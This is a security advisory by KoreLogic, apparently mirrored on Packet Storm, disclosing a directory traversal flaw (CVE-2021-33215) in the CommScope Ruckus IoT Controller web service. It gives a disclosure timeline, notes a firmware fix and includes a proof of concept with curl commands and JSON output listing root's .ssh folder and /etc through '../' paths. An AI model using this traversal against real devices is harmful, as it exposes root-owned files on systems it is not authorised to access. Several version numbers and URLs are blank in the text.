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packetstormJim BecherPACKETSTORM:162846
HistoryMay 27, 2021 - 12:00 a.m.

CommScope Ruckus IoT Controller Web Application Directory Traversal

Jim Becher
commscope ruckus iot controller
directory traversal





`KL-001-2021-005: CommScope Ruckus IoT Controller Web Application Directory Traversal  
Title: CommScope Ruckus IoT Controller Web Application Directory Traversal  
Advisory ID: KL-001-2021-005  
Publication Date: 2021.05.26  
Publication URL:  
1. Vulnerability Details  
Affected Vendor: CommScope  
Affected Product: Ruckus IoT Controller  
Affected Version: and earlier  
Platform: Linux  
CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'),  
CWE-250: Execution with Unnecessary Privileges  
CVE ID: CVE-2021-33215  
2. Vulnerability Description  
A Python script ( for a Dockerized webservice contains  
a directory traversal vulnerability, which can be leveraged by  
an authenticated attacker to view the contents of directories  
on the IoT Controller.  
3. Technical Description  
The CommScope Ruckus IoT Controller features a directory  
traversal vulnerability that allows an authenticated attacker  
to explore the IoT Controller's file system. The vulnerable  
Python script is /VRIOT/ops/docker/webservice/  
With the web application running as root, this allows for all  
directories to be explored.  
An authentication token is required. But a token is easily  
obtained due to hard-coded, default, unchangeable web application  
credentials (CVE-2021-33219).  
4. Mitigation and Remediation Recommendation  
The vendor has released an updated firmware ( which  
remediates the described vulnerability. Firmware and release  
notes are available at:  
5. Credit  
This vulnerability was discovered by Jim Becher (@jimbecher)  
of KoreLogic, Inc.  
6. Disclosure Timeline  
2021.03.30 - KoreLogic submits vulnerability details to  
2021.03.30 - CommScope acknowledges receipt and the intention  
to investigate.  
2021.04.06 - CommScope notifies KoreLogic that this issue,  
along with several others reported by KoreLogic,  
will require more than the standard 45 business  
day remediation timeline.  
2021.04.06 - KoreLogic agrees to extend disclosure embargo if  
2021.04.30 - CommScope informs KoreLogic that remediation for  
this vulnerability will be available inside of the  
standard 45 business day timeline. Requests  
KoreLogic acquire CVE number for this  
2021.05.14 - 30 business days have elapsed since the  
vulnerability was reported to CommScope.  
2021.05.17 - CommScope notifies KoreLogic that the patched  
version of the firmware will be available the week  
of 2021.05.24.  
2021.05.19 - KoreLogic requests CVE from MITRE.  
2021.05.19 - MITRE issues CVE-2021-33215.  
2021.05.25 - CommScope releases firmware and associated  
2021.05.26 - KoreLogic public disclosure.  
7. Proof of Concept  
$ curl -k -H "Authorization: Token [valid token]"  
{u'base_path': u'/VRIOT/node-red/static/../../../../../../../../root/.ssh/',  
u'message': u'List',  
u'response': [{u'is_dir': False,  
u'is_file': True,  
u'is_symlink': False,  
u'name': u'known_hosts',  
u'path': u'/VRIOT/node-red/static/../../../../../../../../root/.ssh/known_hosts',  
u'showpath': u'',  
u'st_atime': 1582707570.3173862,  
u'st_ctime': 1582707550.1438398,  
u'st_dev': 2049,  
u'st_gid': 0,  
u'st_ino': 132199,  
u'st_mode': 33188,  
u'st_mtime': 1582707550.1438398,  
u'st_nlink': 1,  
u'st_size': 963,  
u'st_uid': 0}],  
u'static_path': u'/VRIOT/node-red/static'}  
The above output is a pretty-printed version of the JSON response returned.  
$ curl -k -H "Authorization: Token [valid token]"  
{u'base_path': u'/VRIOT/node-red/static/../../../../../../../../etc/',  
u'message': u'List',  
u'response': [{u'is_dir': True,  
u'is_file': False,  
u'is_symlink': False,  
u'name': u'python3',  
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/python3',  
u'showpath': u'/../../../../../../../../etc/python3',  
u'st_atime': 1610463245.7594006,  
u'st_ctime': 1493664067.5699568,  
u'st_dev': 2049,  
u'st_gid': 0,  
u'st_ino': 262743,  
u'st_mode': 16877,  
u'st_mtime': 1493664067.5699568,  
u'st_nlink': 2,  
u'st_size': 4096,  
u'st_uid': 0},  
{u'is_dir': True,  
u'is_file': False,  
u'is_symlink': False,  
u'name': u'ldap',  
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/ldap',  
u'showpath': u'/../../../../../../../../etc/ldap',  
u'st_atime': 1610463245.7594006,  
u'st_ctime': 1527803641.495955,  
u'st_dev': 2049,  
u'st_gid': 0,  
u'st_ino': 304157,  
u'st_mode': 16877,  
u'st_mtime': 1527803641.495955,  
u'st_nlink': 2,  
u'st_size': 4096,  
u'st_uid': 0},  
{u'is_dir': False,  
u'is_file': True,  
u'is_symlink': False,  
u'name': u'rsyslog.conf',  
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/rsyslog.conf',  
u'showpath': u'',  
u'st_atime': 1609718505.600734,  
u'st_ctime': 1493664067.573957,  
u'st_dev': 2049,  
u'st_gid': 0,  
u'st_ino': 262833,  
u'st_mode': 33188,  
u'st_mtime': 1453934568.0,  
u'st_nlink': 1,  
u'st_size': 1371,  
u'st_uid': 0},  
{u'is_dir': True,  
u'is_file': False,  
u'is_symlink': False,  
u'name': u'pacemaker',  
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/pacemaker',  
u'showpath': u'/../../../../../../../../etc/pacemaker',  
u'st_atime': 1610463245.7674005,  
u'st_ctime': 1550175549.2084513,  
u'st_dev': 2049,  
u'st_gid': 0,  
u'st_ino': 267639,  
u'st_mode': 16877,  
u'st_mtime': 1550175549.2084513,  
u'st_nlink': 2,  
u'st_size': 4096,  
u'st_uid': 0},  
The above output is a pretty-printed version of the JSON response returned.  
The contents of this advisory are copyright(c) 2021  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
Our public vulnerability disclosure policy is available at:  



